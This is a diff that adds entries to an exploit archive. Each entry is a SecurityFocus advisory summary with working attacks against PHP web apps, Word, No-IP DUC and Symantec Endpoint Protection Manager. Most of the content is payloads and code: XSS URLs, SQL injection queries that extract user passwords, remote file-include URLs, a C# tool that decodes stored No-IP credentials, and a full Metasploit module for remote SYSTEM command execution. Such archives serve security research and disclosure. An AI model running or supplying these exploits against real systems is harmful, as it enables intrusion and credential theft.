+http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=[XSS] +http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=> +http://www.example.com/path/snoteform.php?RootID=[XSS] +http://www.example.com/path/snoteform.php?RootID="> +http://www.example.com/path/snoteform.php?RootID=1&SnoteID=[XSS] +http://www.example.com/path/snoteform.php?RootID=1&SnoteID="> +http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=[XSS] +http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel="> +http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=[XSS] +http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat="> diff --git a/platforms/php/webapps/31933.txt b/platforms/php/webapps/31933.txt new file mode 100755 index 000000000..ee743080e --- /dev/null +++ b/platforms/php/webapps/31933.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29765/info + +OpenDocMan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +OpenDocMan 1.2.5 is vulnerable; other versions may also be affected. + +http://www.example.com/opendocman-1.2.5/out.php?last_message=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/31935.txt b/platforms/php/webapps/31935.txt new file mode 100755 index 000000000..918d3331f --- /dev/null +++ b/platforms/php/webapps/31935.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/29771/info + +Basic-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1-- + diff --git a/platforms/php/webapps/31938.txt b/platforms/php/webapps/31938.txt new file mode 100755 index 000000000..2c68ea6f8 --- /dev/null +++ b/platforms/php/webapps/31938.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/29808/info + +KEIL Software's photokorn is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +This issue affects photokorn 1.542; other versions may be vulnerable as well. + +The following proof-of-concept URI is available: + +http://www.example.com/[path]/index.php?action=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/31939.txt b/platforms/php/webapps/31939.txt new file mode 100755 index 000000000..51dfcf8fa --- /dev/null +++ b/platforms/php/webapps/31939.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/29817/info + +vBulletin is prone to a cross-site scripting vulnerability that occurs in the MCP (moderation control panel) because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected. + +http://www.example.com/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K +http://www.example.com/vB3/modcp/index.php?redirect={XSS} \ No newline at end of file diff --git a/platforms/php/webapps/31943.html b/platforms/php/webapps/31943.html new file mode 100755 index 000000000..1c8b8a572 --- /dev/null +++ b/platforms/php/webapps/31943.html @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/29849/info + +GL-SH Deaf Forum is prone to a cross-site scripting vulnerability and an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can exploit the file-upload issue to execute arbitrary code in the context of the webserver. + +GL-SH Deaf Forum 6.5.5 is vulnerable; prior versions may also be affected. + +
    +XSS: +" +

    + search only in topics + search in topics and answers + \ No newline at end of file diff --git a/platforms/php/webapps/31944.txt b/platforms/php/webapps/31944.txt new file mode 100755 index 000000000..afd033167 --- /dev/null +++ b/platforms/php/webapps/31944.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/29856/info + +PHPAuction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/* \ No newline at end of file diff --git a/platforms/php/webapps/31945.txt b/platforms/php/webapps/31945.txt new file mode 100755 index 000000000..45d26dbc0 --- /dev/null +++ b/platforms/php/webapps/31945.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/29865/info + +PEGames is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/path/template2.php?sitetitle=[XSS] +http://www.example.com/path/template2.php?sitenav=[XSS] +http://www.example.com/path/template2.php?sitemain=[XSS] +http://www.example.com/path/template2.php?sitealt=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31946.txt b/platforms/php/webapps/31946.txt new file mode 100755 index 000000000..8da3e6f3e --- /dev/null +++ b/platforms/php/webapps/31946.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29868/info + +IDMOS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +IDMOS 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/path/administrator/admin.php?site_absolute_path=[SHELL] +http://www.example.com/path/administrator/menu_operation.php?site_absolute_path=[SHELL] +http://www.example.com/path/administrator/template_add.php?site_absolute_path=[SHELL] +http://www.example.com/path/administrator/template_operation.php?site_absolute_path=[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/31947.txt b/platforms/php/webapps/31947.txt new file mode 100755 index 000000000..964d488a1 --- /dev/null +++ b/platforms/php/webapps/31947.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29869/info + +The EXP Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +EXP Shop 1.0 is vulnerable; previous versions may also be affected. + +http://www.example.com/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users-- \ No newline at end of file diff --git a/platforms/windows/dos/31934.txt b/platforms/windows/dos/31934.txt new file mode 100755 index 000000000..40bb77578 --- /dev/null +++ b/platforms/windows/dos/31934.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29769/info + +Microsoft Word is prone to a remote memory-corruption vulnerability. + +An attacker could exploit this issue by enticing a victim to open and interact with malicious Word files. + +Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user. + +http://www.exploit-db.com/sploits/31934-1.doc +http://www.exploit-db.com/sploits/31934-2.doc +http://www.exploit-db.com/sploits/31934-3.doc +http://www.exploit-db.com/sploits/31934-4.doc \ No newline at end of file diff --git a/platforms/windows/local/31930.txt b/platforms/windows/local/31930.txt new file mode 100755 index 000000000..f09bfecb0 --- /dev/null +++ b/platforms/windows/local/31930.txt @@ -0,0 +1,78 @@ +source: http://www.securityfocus.com/bid/29758/info + +The DUC application for No-IP is prone to a local information-disclosure vulnerability when it is running on Microsoft Windows. + +Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks. + +/* +* DUC NO-IP Local Password Information Disclosure +* Author(s): Charalambous Glafkos +* George Nicolaou +* Date: March 11, 2008 +* Site: http://www.astalavista.com +* Mail: glafkos@astalavista.com +* ishtus@astalavista.com +* +* Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error. +* Attackers can exploit this issue to obtain sensitive information including tray password, +* web username, password and hostnames that may lead to further attacks. +* +* Note: Vendor has been notified long time ago confirming a design error. +* Vendor site: http://www.no-ip.com +* +*/ + +using System; +using System.Text; +using System.IO; +using Microsoft.Win32; + +namespace getRegistryValue +{ + class getValue + { + static void Main() + { + getValue details = new getValue(); + String strDUC = details.getDUC(); + Console.WriteLine("\nDUC NO-IP Password Decoder v1.2"); + Console.WriteLine("Author: Charalambous Glafkos"); + Console.WriteLine("Bugs: glafkos@astalavista.com"); + Console.WriteLine(strDUC); + + FileInfo t = new FileInfo("no-ip.txt"); + StreamWriter Tex = t.CreateText(); + Tex.WriteLine(strDUC); + Tex.Write(Tex.NewLine); + Tex.Close(); + Console.WriteLine("\nThe file named no-ip.txt is created\n"); + } + + private string getDUC() + { + RegistryKey ducKey = Registry.LocalMachine; + ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false); + String TrayPassword = DecodeBytes(ducKey.GetValue("TrayPassword").ToString()); + String Username = ducKey.GetValue("Username").ToString(); + String Password = DecodeBytes(ducKey.GetValue("Password").ToString()); + String Hostnames = ducKey.GetValue("Hosts").ToString(); + String strDUC = "\nTrayPassword: " + TrayPassword + + "\nUsername: " + Username + + "\nPassword: " + Password + + "\nHostnames: " + Hostnames; + return strDUC; + } + + public static string DecodeBytes(String encryptedData) + { + Byte[] toDecodeByte = Convert.FromBase64String(encryptedData); + System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding(); + System.Text.Decoder utf8Decode = encoder.GetDecoder(); + int charCount = utf8Decode.GetCharCount(toDecodeByte, 0, toDecodeByte.Length); + Char[] decodedChar = new char[charCount]; + utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 0); + String result = new String(decodedChar); + return (new string(decodedChar)); + } + } +} diff --git a/platforms/windows/remote/31917.rb b/platforms/windows/remote/31917.rb new file mode 100755 index 000000000..b41f40c20 --- /dev/null +++ b/platforms/windows/remote/31917.rb @@ -0,0 +1,123 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/powershell' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include REXML + include Msf::Exploit::CmdStagerVBS + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution', + 'Description' => %q{ + This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager + versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker + can reach SQL injection affected components. As xp_cmdshell is enabled in the included + database instance, it's possible to execute arbitrary system commands on the remote system + with SYSTEM privileges. + }, + 'Author' => + [ + 'Stefan Viehbock', # Discovery + 'Chris Graham', # PoC exploit + 'xistence ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-5014' ], + [ 'CVE', '2013-5015' ], + [ 'EDB', '31853'], + [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ] + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows VBS Stager', {}] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Feb 24 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9090), + OptString.new('TARGETURI', [true, 'The base path', '/']) + ], self.class) + end + + def check + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + }) + + if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/ + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Safe + end + + def exploit + print_status("#{peer} - Sending payload") + # Execute the cmdstager, max length of the commands is ~3950 + execute_cmdstager({:linemax => 3950}) + end + + def execute_command(cmd, opts = {}) + # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML. + command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}" + + # Generate random 'xx032xxxx' sequence number. + seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}" + + soap = soap_request(seqnum, command) + + post_data = Rex::MIME::Message.new + post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"") + xxe = post_data.to_s + + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), + 'method' => 'POST', + 'vars_get' => { 'ActionType' => 'ConsoleLog' }, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => xxe, + }) + + if res and res.body !~ /ResponseCode/ + fail_with(Failure::Unknown, "#{peer} - Something went wrong.") + end + end + + def soap_request(seqnum, command) + randpayload = rand_text_alpha(8+rand(8)) + randxxe = rand_text_alpha(8+rand(8)) + entity = "" + + xml = Document.new + xml.add(DocType.new('sepm', "[ METASPLOIT ]")) + xml.add_element("Request") + xxe = xml.root.add_element(randxxe) + xxe.text = "PAYLOAD" + + xml_s = xml.to_s + xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding + xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding + + xml_s + end + +end